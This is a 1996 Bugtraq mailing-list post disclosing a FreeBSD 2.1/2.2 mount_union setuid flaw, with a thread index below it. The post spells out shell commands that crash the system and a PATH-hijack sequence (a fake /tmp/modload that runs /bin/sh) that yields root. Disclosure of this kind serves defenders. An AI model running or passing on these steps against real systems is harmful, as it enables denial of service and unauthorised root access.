Bugtraq mailing list archives
BoS: SECURITY BUG in FreeBSD
From: CHRISL () gazeta pl (Krzysztof Labanowski)
Date: Fri, 17 May 1996 10:18:24 -0500
Hi! FreeBSD has a security hole... dangerous is mount_union if suid is set vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT probably FreeBSD 2.1 STABLE is not vulnerable to crash system (as a normal user) try this: mkdir a mkdir b mount_union ~/a ~/b mount_union -b ~/a ~/b to got euid try this: export PATH=/tmp:$PATH #if zsh, of course echo /bin/sh >/tmp/modload chmod +x /tmp/modload mount_union /dir1 /dir2 and You are root! Hole found by Adam Kubicki Best wishes Chris Labanowski KL
Current thread:
- TCP SYN probe detection tool available Doug Hughes (May 14)
- Re: TCP SYN probe detection tool available Brian Mitchell (May 15)
- information on syslog bug wanted ALEXANDER SCHUETZ (May 17)
- BoS: SECURITY BUG in FreeBSD Krzysztof Labanowski (May 17)
- Re: BoS: SECURITY BUG in FreeBSD Dan Cross (May 17)
- Re: BoS: SECURITY BUG in FreeBSD Steve Reid (May 17)
- <Possible follow-ups>
- Re: TCP SYN probe detection tool available redeye () compulink gr (May 15)
- Re: TCP SYN probe detection tool available Casper Dik (May 16)
- SunOS 4.1.4 fingerd Andy Dills (May 16)
- Re: SunOS 4.1.4 fingerd Dave Dittrich (May 16)
- Re: fingerd problems Elliot Lee (May 16)
- Re: fingerd problems Jon Lewis (May 16)
- Re: fingerd problems Brian Mitchell (May 16)
- Re: fingerd problems Robert A. Pickering Jr. (May 17)
- Re: TCP SYN probe detection tool available Casper Dik (May 16)
- Re: TCP SYN probe detection tool available Brian Mitchell (May 15)